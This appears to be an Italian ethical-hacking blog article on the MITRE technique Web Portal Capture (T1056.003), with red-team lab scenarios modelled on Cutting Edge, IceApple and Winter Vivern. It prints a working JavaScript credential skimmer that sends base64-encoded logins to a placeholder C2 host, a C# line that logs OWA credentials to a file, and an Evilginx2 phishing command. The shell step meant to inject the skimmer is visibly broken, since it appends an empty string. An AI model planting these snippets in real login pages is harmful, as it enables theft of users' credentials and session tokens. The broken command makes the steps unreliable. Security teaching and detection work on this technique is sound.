Cattura Credenziali dal Portale Web: Web Portal Capture (T1056.003)

La tecnica Web Portal Capture consiste nell'iniettare codice malevolo all'interno di pagine di login esposte su Internet — portali VPN, webmail, SSO — per intercettare le credenziali degli utenti nel momento stesso in cui le digitano. Il meccanismo è subdolo: l'utente vede la pagina autentica, inserisce username e password, accede normalmente al servizio, ma nel frattempo i dati transitano verso un canale controllato dall'attaccante.

Questa tecnica si colloca a cavallo di due tattiche. In Collection (TA0009) rappresenta un metodo di raccolta dati dall'ambiente compromesso: l'avversario harvesta credenziali in tempo reale senza bisogno di esfiltrarle da un database. In Credential Access (TA0006) è uno strumento diretto per ottenere account e password validi, che poi abilitano movimenti laterali, persistenza tramite Valid Accounts e accesso continuo via External Remote Services.

L'attacco può manifestarsi in due fasi distinte della kill chain. Nella prima, l'attaccante sfrutta una vulnerabilità del portale esposto per modificare la pagina di login come vettore iniziale. Nella seconda — più insidiosa — un avversario che ha già ottenuto accesso amministrativo modifica il portale come meccanismo di backup per mantenere la persistenza anche se le credenziali iniziali vengono ruotate. I dati disponibili documentano 1 gruppo APT, 2 malware, 2 campagne e 1 mitigazione formalmente associati a questa tecnica.

La simulazione di Web Portal Capture in laboratorio richiede un portale di login controllato e la capacità di iniettare JavaScript o codice server-side che catturi le credenziali prima del submit legittimo. L'obiettivo del red teamer è dimostrare quanto sia semplice trasformare una pagina autentica in un collettore di credenziali una volta ottenuto accesso al filesystem del web server.

Scenario 1 — Injection JavaScript su portale VPN (simula Cutting Edge)

L'approccio più diretto replica ciò che è stato osservato nella campagna Cutting Edge (C0029): modificare il file JavaScript caricato dalla pagina di login per aggiungere un hook sull'evento di submit del form. In laboratorio, prepara un ambiente con un portale web su Apache o Nginx e un file di login HTML/JS.

Crea uno snippet JavaScript che intercetti il submit:

document.getElementById('loginForm').addEventListener('submit', function(e) { var creds = btoa(document.getElementById('user').value + ':' + document.getElementById('pass').value); new Image().src = '<server-C2-laboratorio>/collect?d=' + creds; });

Inietta questo codice nel file JavaScript originale del portale. Per simulare l'accesso amministrativo abusato, utilizza SSH con credenziali valide verso il server e modifica il file direttamente:

echo '' >> /var/www/html/login.html

Scenario 2 — Modifica server-side su IIS/OWA (simula IceApple)

Per replicare il comportamento di IceApple (S1022) su OWA, lavora in un lab con Exchange Server e modifica la pagina di autenticazione ASPX. Inserisci un code-behind che logga le credenziali in un file locale:

File.AppendAllText(@"C:\Windows\Temp\auth.log", username + ":" + password + Environment.NewLine);

Questo approccio simula il credential logger OWA di IceApple senza componenti di rete.

Scenario 3 — Phishing portal con cattura credenziali (simula Winter Vivern)

Per replicare l'approccio di Winter Vivern (G1035), utilizza Gophish (open source) o Evilginx2 (open source) per creare una pagina di login che mima un portale governativo. Evilginx2 funziona come reverse proxy e cattura sia credenziali sia token di sessione, consentendo il bypass MFA in contesti di test autorizzato.

evilginx2 -p phishlets

Dopo aver configurato il phishlet appropriato, il tool cattura le credenziali in transito e le memorizza nel proprio database locale.

Per la validazione dell'intera catena, verifica che WARPWIRE (S1116) rappresenta l'approccio più aggressivo: cattura credenziali durante il logon web per accedere ad applicazioni layer 7 come RDP, dimostrando che il vettore non si limita al furto di password ma abilita accesso diretto ai servizi interni.

Vuoi diventare un Ethical Hacker ma non sai da dove iniziare?

Scarica la guida gratuita e segui il percorso corretto fin dal primo passo

We use cookies

Utilizziamo i cookie sul nostro sito Web. Alcuni di essi sono essenziali per il funzionamento del sito, mentre altri ci aiutano a migliorare questo sito e l'esperienza dell'utente (cookie di tracciamento). Puoi decidere tu stesso se consentire o meno i cookie. Ti preghiamo di notare che se li rifiuti, potresti non essere in grado di utilizzare tutte le funzionalità del sito.